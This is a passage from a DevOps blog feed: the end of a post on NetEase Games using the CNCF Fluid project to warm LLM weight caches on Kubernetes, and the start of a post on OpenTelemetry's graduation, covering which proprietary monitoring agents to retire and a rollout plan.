        </h2><p><a href="https://github.com/fluid-cloudnative/fluid">Fluid</a> is a CNCF incubating project that does something subtle. It treats datasets as Kubernetes-native objects. You declare a <code>Dataset</code> and a <code>Runtime</code> resource, and Fluid orchestrates the cache layer, scheduling, and pod-to-cache binding for you.</p>
<p>A minimal Fluid setup looks like this:</p>
<pre><code class="hljs language-yaml"><span class="hljs-attr">apiVersion:</span> <span class="hljs-string">data.fluid.io/v1alpha1</span>
<span class="hljs-attr">kind:</span> <span class="hljs-string">Dataset</span>
<span class="hljs-attr">metadata:</span>
  <span class="hljs-attr">name:</span> <span class="hljs-string">llama-3-70b</span>
<span class="hljs-attr">spec:</span>
  <span class="hljs-attr">mounts:</span>
    <span class="hljs-bullet">-</span> <span class="hljs-attr">mountPoint:</span> <span class="hljs-string">s3://models.example/llama-3-70b/</span>
      <span class="hljs-attr">name:</span> <span class="hljs-string">weights</span>
  <span class="hljs-attr">accessModes:</span>
    <span class="hljs-bullet">-</span> <span class="hljs-string">ReadOnlyMany</span>
<span class="hljs-meta">---</span>
<span class="hljs-attr">apiVersion:</span> <span class="hljs-string">data.fluid.io/v1alpha1</span>
<span class="hljs-attr">kind:</span> <span class="hljs-string">AlluxioRuntime</span>
<span class="hljs-attr">metadata:</span>
  <span class="hljs-attr">name:</span> <span class="hljs-string">llama-3-70b</span>
<span class="hljs-attr">spec:</span>
  <span class="hljs-attr">replicas:</span> <span class="hljs-number">3</span>                   <span class="hljs-comment"># how many cache workers</span>
  <span class="hljs-attr">tieredstore:</span>
    <span class="hljs-attr">levels:</span>
      <span class="hljs-bullet">-</span> <span class="hljs-attr">mediumtype:</span> <span class="hljs-string">SSD</span>
        <span class="hljs-attr">path:</span> <span class="hljs-string">/mnt/cache</span>
        <span class="hljs-attr">quota:</span> <span class="hljs-string">200Gi</span>
</code></pre><p>Two YAMLs and Fluid spins up a cache cluster on the nodes you specify, mounts the S3 bucket behind it, and exposes a PVC your inference pods can mount as if the weights were already on the local disk. The CSI driver Fluid registers handles the &quot;make this look like a local mount&quot; part.</p>
<p>Where Fluid earns its 14-minute-to-3-minute win is the <strong>prefetch workflow</strong>. You can declare a <code>DataLoad</code> resource that says &quot;warm this dataset into the cache on a schedule&quot; or &quot;warm it whenever a webhook fires&quot;. When a new pod requests the weights, the data is already in the local cache cluster, not still being pulled from S3.</p>
<pre><code class="hljs language-yaml"><span class="hljs-attr">apiVersion:</span> <span class="hljs-string">data.fluid.io/v1alpha1</span>
<span class="hljs-attr">kind:</span> <span class="hljs-string">DataLoad</span>
<span class="hljs-attr">metadata:</span>
  <span class="hljs-attr">name:</span> <span class="hljs-string">warm-llama</span>
<span class="hljs-attr">spec:</span>
  <span class="hljs-attr">dataset:</span>
    <span class="hljs-attr">name:</span> <span class="hljs-string">llama-3-70b</span>
    <span class="hljs-attr">namespace:</span> <span class="hljs-string">inference</span>
  <span class="hljs-attr">loadMetadata:</span> <span class="hljs-literal">true</span>
  <span class="hljs-attr">target:</span>
    <span class="hljs-bullet">-</span> <span class="hljs-attr">path:</span> <span class="hljs-string">/</span>
      <span class="hljs-attr">replicas:</span> <span class="hljs-number">3</span>
</code></pre><p>The 3-minute number is what you get with Fluid orchestrating a warm cache but the pod still doing the actual weight read at startup. The cache is on the same network as the GPU, but the bytes still have to traverse the host network and load into the model loader process.</p>
<h2 id="h2-bet-3-proactive-warmup-treating-data-as-a-workload" class="group relative scroll-mt-24">
        <a href="#h2-bet-3-proactive-warmup-treating-data-as-a-workload" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          Bet 3: proactive warmup, treating data as a workload
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h2-bet-3-proactive-warmup-treating-data-as-a-workload"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h2><p>The last 10x is the one that takes engineering judgment. The NetEase post highlights three capabilities Fluid provides for this stage:</p>
<ul>
<li><strong>Scheduled, event-driven, and proactive warmup.</strong> The cache fills before any pod requests it. The warmup itself runs as a workload, with its own resource requests and priority.</li>
<li><strong>CSI- and Sidecar-based access patterns.</strong> Critical for letting an inference pod consume a dataset that lives in a different namespace, without copying or duplicating the data.</li>
<li><strong>Cross-namespace dataset sharing with logical isolation.</strong> One team&#39;s <code>Dataset</code> resource can be referenced by another team&#39;s pods, but with the access controls staying intact.</li>
</ul>
<p>The pattern that gets you to 30 seconds (or under) is to treat model warmup as a deployment concern, not a runtime concern:</p>
<ol>
<li>When you publish a new model version, you also schedule a <code>DataLoad</code> that warms it across the inference cluster&#39;s cache nodes.</li>
<li>The warmup completes before any pod requesting that model is scheduled.</li>
<li>The Kubernetes scheduler co-locates the inference pod with a cache node that has the weights resident.</li>
<li>The pod&#39;s only cold-path is the local-disk read + GPU memory copy, which on modern NVMe + PCIe is a few seconds for tens of GB.</li>
</ol>
<p>The mental shift is from &quot;lazy load on demand&quot; to &quot;the data is already there because we put it there.&quot; This is the same shift CDNs went through in the 2010s. The cache fills are not the user&#39;s problem.</p>
<h2 id="h2-what-the-case-study-doesnt-tell-you" class="group relative scroll-mt-24">
        <a href="#h2-what-the-case-study-doesnt-tell-you" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          What the case study doesn't tell you
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h2-what-the-case-study-doesnt-tell-you"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h2><p>A few things worth being honest about because the post glosses over them:</p>
<ul>
<li><strong>They didn&#39;t say what model sizes.</strong> &quot;30 seconds&quot; is for some workload they measured. If your model is 7B parameters (~14GB) you&#39;ll do better. If it&#39;s 405B parameters (~800GB), even Fluid can&#39;t make that fit on a single cache node.</li>
<li><strong>They didn&#39;t say what GPU types.</strong> PCIe 4 versus PCIe 5 versus the NVLink-attached HBM on modern accelerators changes the &quot;weight-load-into-GPU-memory&quot; portion of the cold path by 3-5x.</li>
<li><strong>They didn&#39;t share the actual Fluid YAML they run in production.</strong> The snippets above are minimal-viable shapes from Fluid&#39;s docs, not NetEase&#39;s actual config. Production setups have priorities, taints, resource quotas, and observability hooks that aren&#39;t in the case study.</li>
</ul>
<p>That&#39;s normal for an end-user post; the architectural takeaway is what&#39;s portable, not the exact tuning.</p>
<h2 id="h2-how-to-apply-the-pattern-without-fluid" class="group relative scroll-mt-24">
        <a href="#h2-how-to-apply-the-pattern-without-fluid" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          How to apply the pattern without Fluid
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h2-how-to-apply-the-pattern-without-fluid"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h2><p>If you&#39;re not on Kubernetes, the principles still transfer:</p>
<ol>
<li><strong>Put the cache on the inference node, not across the network.</strong> Local NVMe at 7 GB/s reads beats network-attached storage at 1-2 GB/s by 3-5x.</li>
<li><strong>Warm the cache before the pod starts.</strong> Tie cache warming to your CI/CD pipeline. When a new model version ships, the deploy step is <code>(a) push weights to object storage</code> AND <code>(b) push a warmup job to every inference region</code>. Both run before any traffic is routed to the new version.</li>
<li><strong>Treat model weights as a first-class artifact.</strong> They are not configuration. They are not a runtime dependency. They are a build artifact with their own versioning, signing, and distribution path. Sign them with the same tooling you sign container images (cosign + Sigstore both support arbitrary blobs).</li>
<li><strong>If you&#39;re on serverless GPU (Modal, RunPod, Beam, Lambda Labs, Cerebrium, Replicate), check the warm-pool feature.</strong> Every credible serverless GPU vendor in 2026 has a &quot;keep N instances pre-loaded&quot; knob. Pay the holding cost; the cold-start fix isn&#39;t worth the engineering time for a workload that hits cold pods a handful of times a day.</li>
<li><strong>Measure where your cold start actually goes.</strong> A simple <code>kubectl describe pod</code> + <code>kubectl logs --previous</code> for a cold-started inference pod will tell you whether you&#39;re 90% on weight load or 90% on image pull. The fix is different for each.</li>
</ol>
<h2 id="h2-why-this-matters-beyond-llm-inference" class="group relative scroll-mt-24">
        <a href="#h2-why-this-matters-beyond-llm-inference" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          Why this matters beyond LLM inference
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h2-why-this-matters-beyond-llm-inference"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h2><p>The same pattern applies anywhere a workload needs a large blob of data to start. Big data jobs reading TB-scale datasets, video transcoders pulling reference assets, simulation workloads that need GIS data, security tools pulling threat intel snapshots. The cost of &quot;lazy load from object storage&quot; goes up linearly with the size of the blob and the distance to it. The cost of &quot;warm cache, locality-aware scheduling&quot; stays flat.</p>
<p>Fluid is doing for data-intensive workloads what Kubernetes already did for compute: making placement, scheduling, and lifecycle into first-class concerns instead of operational accidents. The graduation path the project is on (incubating today, likely graduating in 2027) is worth tracking if any of your workloads cold-start on more than a few hundred MB of data.</p>
<h2 id="h2-summary" class="group relative scroll-mt-24">
        <a href="#h2-summary" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          Summary
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h2-summary"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h2><p>NetEase Games turned a 42-minute inference cold start into 30 seconds by stopping treating model weights as something to lazy-load from object storage at runtime. The CNCF Fluid project gave them the Kubernetes-native primitives (Dataset, Runtime, DataLoad) to make cache warming a deployment concern instead of a runtime gamble. The principles transfer to any large-blob cold-start problem, with or without Kubernetes.</p>
<p>If your LLM endpoint takes more than a minute to come online, the bottleneck is almost certainly weight loading, and the fix is almost certainly cache + locality + proactive warmup. Spend a sprint measuring where the time actually goes, then borrow whichever piece of this pattern matches your stack.</p>
<p>Sources:</p>
<ul>
<li><a href="https://www.cncf.io/blog/2026/05/21/how-netease-games-achieved-30-second-llm-cold-starts-on-kubernetes/">NetEase Games + Fluid case study (CNCF blog)</a></li>
<li><a href="https://github.com/fluid-cloudnative/fluid">Fluid project on GitHub</a></li>
<li><a href="https://www.alluxio.io/">Alluxio docs</a></li>
</ul>
]]></content:encoded>
    </item>
    <item>
      <title><![CDATA[OpenTelemetry Just Graduated: What to Retire from Your Stack This Quarter]]></title>
      <link>https://devops-daily.com/posts/opentelemetry-graduated-what-to-retire-this-quarter</link>
      <description><![CDATA[On May 21, 2026, CNCF graduated OpenTelemetry. All three core signals (traces, metrics, logs) are now production-ready, the project is the second-most-active in CNCF after Kubernetes itself, and Anthropic, Bloomberg, Capital One, eBay, and Heroku run it at scale. Here is the decision framework for what proprietary agents you can stop running, what is still risky, and the 90-day adoption checklist.]]></description>
      <pubDate>Tue, 26 May 2026 10:00:00 GMT</pubDate>
      <guid isPermaLink="true">https://devops-daily.com/posts/opentelemetry-graduated-what-to-retire-this-quarter</guid>
      <category><![CDATA[DevOps]]></category>
      <author><![CDATA[DevOps Daily Team]]></author>
      <category><![CDATA[OpenTelemetry]]></category><category><![CDATA[Observability]]></category><category><![CDATA[CNCF]]></category><category><![CDATA[DevOps]]></category><category><![CDATA[Kubernetes]]></category>
      <content:encoded><![CDATA[<p>On May 21, 2026, the <a href="https://www.cncf.io/announcements/2026/05/21/cloud-native-computing-foundation-announces-opentelemetrys-graduation-solidifying-status-as-the-de-facto-observability-standard/">Cloud Native Computing Foundation graduated OpenTelemetry</a> at the Observability Summit in Minneapolis. The headline number is that OTel is now the second-most-active project in the CNCF behind Kubernetes itself, with more than 12,000 contributors from 2,800 companies. The numbers most teams should care about are the ones underneath: traces, metrics, and logs are all production-stable as of this graduation. Profiling moved to alpha at the same time.</p>
<p>If your team has been running OpenTelemetry alongside a vendor-specific agent (Datadog Agent, New Relic Agent, Splunk Universal Forwarder, Dynatrace OneAgent, the AWS X-Ray daemon) because &quot;OTel isn&#39;t quite there yet,&quot; the calculus changed last week. This post is the practical version: which proprietary agents you can actually retire, which to keep, and the 90-day rollout plan that gets you to a single OTel Collector shipping to whichever backends your team uses.</p>
<h2 id="h2-tldr" class="group relative scroll-mt-24">
        <a href="#h2-tldr" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          TL;DR
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h2-tldr"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h2><ul>
<li>CNCF graduation criteria require independent security audit, formal governance review, and proven production adoption. OpenTelemetry cleared all three with the third-largest contributor base in cloud-native.</li>
<li>All three core signals (traces, metrics, logs) are now production-ready. Profiles is alpha.</li>
<li>The OTel Collector is the unified shipping layer. You run one collector per host or per cluster, and it fans out to any combination of backends. No more &quot;one agent per vendor&quot;.</li>
<li>Retire candidates: Datadog Agent, New Relic Infrastructure Agent, Splunk Universal Forwarder for logs+metrics, FluentBit/FluentD log-only paths, Prometheus node_exporter scrape pipelines you still own. Each has an OTel equivalent that&#39;s production-stable.</li>
<li>Keep for now: vendor APM auto-instrumentation libraries on languages where OTel&#39;s contrib instrumentation hasn&#39;t caught up (Ruby on Rails edges, older PHP versions), eBPF profilers that depend on vendor-specific kernel modules.</li>
<li>90-day rollout: collector in shadow mode → one signal at a time → kill the proprietary agent → repeat per language runtime.</li>
</ul>
<h2 id="h2-prerequisites" class="group relative scroll-mt-24">
        <a href="#h2-prerequisites" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          Prerequisites
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h2-prerequisites"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h2><ul>
<li>A cluster or fleet where you can deploy a sidecar/DaemonSet without a change-management committee.</li>
<li>At least one observability vendor account that can ingest OTLP/HTTP or OTLP/gRPC. Every major vendor accepts it now, but verify the endpoint and the auth header before you start a migration.</li>
<li>Inventory of every agent currently running. <code>ps aux | grep -iE &#39;datadog|newrelic|splunkd|fluentd|fluent-bit|otelcol&#39;</code> on one production host gets you a starting list.</li>
</ul>
<h2 id="h2-what-graduation-actually-unlocks" class="group relative scroll-mt-24">
        <a href="#h2-what-graduation-actually-unlocks" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          What graduation actually unlocks
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h2-what-graduation-actually-unlocks"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h2><p>CNCF graduation is more than a vanity badge. To clear the bar, a project needs to pass an independent security audit, hold a formal governance review with the TOC, and demonstrate widespread production adoption. The full criteria are in CNCF&#39;s <a href="https://github.com/cncf/toc/blob/main/process/graduation_criteria.md">Graduation policy</a>. Projects that have graduated before OTel include Kubernetes, Helm, Prometheus, etcd, and Envoy. The bar is meaningful.</p>
<p>For OpenTelemetry specifically, what changed at graduation is mostly social rather than technical. The bits were already there. Graduation tells your security team, your platform leads, and your CFO that this is a safe project to standardize on. The argument &quot;let&#39;s wait until OTel is more mature&quot; is now formally over. If you&#39;re still running three agents per host to satisfy three teams&#39; tool preferences, the cost-of-status-quo math just shifted.</p>
<p>The most useful technical surface OTel offers is the <a href="https://opentelemetry.io/docs/collector/">Collector</a>. One binary, one config, and it can:</p>
<ul>
<li>Receive traces, metrics, and logs over OTLP (or scrape Prometheus, tail log files, pull host metrics, hook into eBPF).</li>
<li>Process them (sample, batch, redact PII, attach k8s metadata, tail-sample on error).</li>
<li>Export to anywhere. Datadog, New Relic, Splunk, Honeycomb, Grafana Cloud, Tempo, Mimir, Loki, ClickHouse, S3, whatever.</li>
</ul>
<p>The &quot;one collector, many backends&quot; architecture is what makes the retire-the-vendor-agents play work. You&#39;re not removing your observability, you&#39;re removing the layer that locked you to a single ingestion path.</p>
<h2 id="h2-whats-actually-production-stable" class="group relative scroll-mt-24">
        <a href="#h2-whats-actually-production-stable" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          What's actually production-stable
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h2-whats-actually-production-stable"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h2><p>The CNCF announcement explicitly named all three core signals as production-ready:</p>
<pre><code class="hljs language-text">Traces       : Stable (since 2023)
Metrics      : Stable (since late 2023)
Logs         : Stable
Profiles     : Alpha (just promoted)
</code></pre><p>The signal-status nuance worth knowing:</p>
<ul>
<li><strong>Traces</strong> were the first to stabilize and are by far the most mature. The auto-instrumentation libraries for Node.js, Python, Java, and .NET are at parity with the closed-source equivalents from APM vendors for most application frameworks. Go and Rust still benefit from manual instrumentation in some hot paths.</li>
<li><strong>Metrics</strong> are stable but have one foot in the Prometheus world. If your team already runs Prometheus servers, OTel metrics give you a way to ship the same metric to Prometheus AND a SaaS without scraping twice. The OTel-Prometheus interop story is solid.</li>
<li><strong>Logs</strong> stabilized later than traces and metrics. The OTel logging SDKs are production-ready, but the ergonomics on existing structured-logger libraries (log/slog in Go, the Python logging module, Java&#39;s Logback) still feel like a wrapper layer. Functional, but if you have a working Fluent Bit pipeline that nobody complains about, the migration ROI is lower than for traces.</li>
<li><strong>Profiles</strong> is alpha and should be treated as such. eBPF-based profilers (Parca, Pyroscope) are still the right choice if continuous profiling is core to your workflow. Revisit in 12 months.</li>
</ul>
<h2 id="h2-retire-from-stack-candidates-ranked-by-roi" class="group relative scroll-mt-24">
        <a href="#h2-retire-from-stack-candidates-ranked-by-roi" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          Retire-from-stack candidates, ranked by ROI
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h2-retire-from-stack-candidates-ranked-by-roi"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h2><p>These are the proprietary agents where I&#39;d push hardest to replace with the OTel Collector. ROI here is &quot;engineering hours saved per quarter&quot; plus &quot;one-fewer-agent attack surface.&quot;</p>
<h3 id="h3-high-confidence-replace" class="group relative scroll-mt-24">
        <a href="#h3-high-confidence-replace" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          High-confidence: replace
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h3-high-confidence-replace"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h3><p><strong>Datadog Agent → OTel Collector + datadog exporter.</strong> Datadog accepts OTLP natively now. The OTel Collector&#39;s <code>datadogexporter</code> is maintained by Datadog and ships traces/metrics/logs into your existing Datadog org. You keep the dashboards, the SLOs, the monitors. You stop running their proprietary agent on every host. Their docs at <a href="https://docs.datadoghq.com/opentelemetry/">https://docs.datadoghq.com/opentelemetry/</a> walk through it.</p>
<p><strong>New Relic Infrastructure Agent → OTel Collector + otlp exporter.</strong> Same shape. New Relic has supported OTLP ingestion for over a year. The cutover is a Collector config + an env var change on your services.</p>
<p><strong>Splunk Universal Forwarder for logs and metrics → OTel Collector + splunk_hec exporter.</strong> Splunk Observability is built on OpenTelemetry internally, and Splunk Enterprise accepts HEC over OTLP. If you&#39;re still running UF on every host for the &quot;send everything to indexer&quot; pattern, the OTel Collector does it with smaller memory and CPU footprint.</p>
<p><strong>FluentBit / FluentD log-only deployments → OTel Collector with filelog receiver.</strong> Slightly more controversial because FluentBit is excellent at what it does and has a smaller binary. The argument is consolidation: if you&#39;re already running an OTel Collector for traces and metrics, adding the filelog receiver removes the second daemon. If you&#39;re not, FluentBit stays the right call.</p>
<p><strong>Prometheus node_exporter + scrape pipeline you maintain → OTel Collector with hostmetrics receiver.</strong> For the case where you&#39;re scraping a fleet you control, the hostmetrics receiver gives you the same dimensions (CPU, memory, disk, network, filesystem) with one less moving part. For the case where you scrape arbitrary apps that expose Prometheus endpoints, keep the scrape; the OTel Collector can do that scraping too.</p>
<h3 id="h3-keep-for-now" class="group relative scroll-mt-24">
        <a href="#h3-keep-for-now" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          Keep for now
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h3-keep-for-now"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h3><p><strong>Vendor APM auto-instrumentation libraries</strong> on languages where OTel-contrib lags. Ruby on Rails apps that depend on the Datadog <code>dd-trace-rb</code> for AR span enrichment, older PHP 7.x where the OTel PHP SDK is still maturing. The right move is to keep the vendor lib in those services and use the OTel Collector as the egress layer.</p>
<p><strong>eBPF profilers with vendor-specific kernel modules.</strong> Pyroscope and Parca have great OTel integration paths. Datadog&#39;s continuous profiler uses its own kernel hook. If you depend on the Datadog profiler today, OTel profiles being alpha is not enough to switch.</p>
<p><strong>AWS X-Ray daemon</strong> if you&#39;re heavily invested in X-Ray as a backend. AWS accepts OTLP, but X-Ray&#39;s free tier and ECS Fargate-native integration make the X-Ray daemon a defensible choice for AWS-only shops. For multi-cloud, OTel.</p>
<h2 id="h2-the-90-day-rollout-plan" class="group relative scroll-mt-24">
        <a href="#h2-the-90-day-rollout-plan" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          The 90-day rollout plan
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h2-the-90-day-rollout-plan"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h2><p>The pattern that works is the same in every team I&#39;ve seen do this without an incident:</p>
<p><strong>Days 1-14: shadow-mode collector.</strong> Deploy the OTel Collector as a sidecar (per pod) or DaemonSet (per node) alongside your existing agents. Configure it to receive but not export to your production backend yet. The receiver-only config is two lines:</p>
<pre><code class="hljs language-yaml"><span class="hljs-attr">receivers:</span>
  <span class="hljs-attr">otlp:</span>
    <span class="hljs-attr">protocols:</span>
      <span class="hljs-attr">grpc:</span> { <span class="hljs-attr">endpoint:</span> <span class="hljs-number">0.0</span><span class="hljs-number">.0</span><span class="hljs-number">.0</span><span class="hljs-string">:4317</span> }
      <span class="hljs-attr">http:</span> { <span class="hljs-attr">endpoint:</span> <span class="hljs-number">0.0</span><span class="hljs-number">.0</span><span class="hljs-number">.0</span><span class="hljs-string">:4318</span> }
